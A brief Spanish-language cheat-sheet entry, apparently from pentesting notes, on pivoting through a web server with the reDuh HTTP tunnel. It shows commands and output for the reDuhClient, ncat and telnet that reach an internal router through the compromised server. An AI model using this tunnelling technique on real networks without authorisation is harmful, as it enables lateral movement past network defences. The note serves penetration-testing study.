# Reduh


Utilizamos telnet para conectarnos a un router interno y pivotamos en un servidor web.
El tráfico telnet está encapsulado por un túnel HTTP entre local y servidor.
El router recibe la conexión telnet desde la @ip de servidor.


local# java -jar reDuhClient.jar http://servidor/reDuh.php
[Info]Querying remote web page for usable remote service port
[Info]Remote RPC port chosen as 42005
[Info]Attempting to start reDuh from servidor:80/reDuh.php.  Using service port 42005. Please wait...
[Info]reDuhClient service listener started on local port 1010
local# ncat local 1010
Welcome to the reDuh command line
 Successfully bound locally to port 1234. Awaiting connections.

local# telnet local 1234

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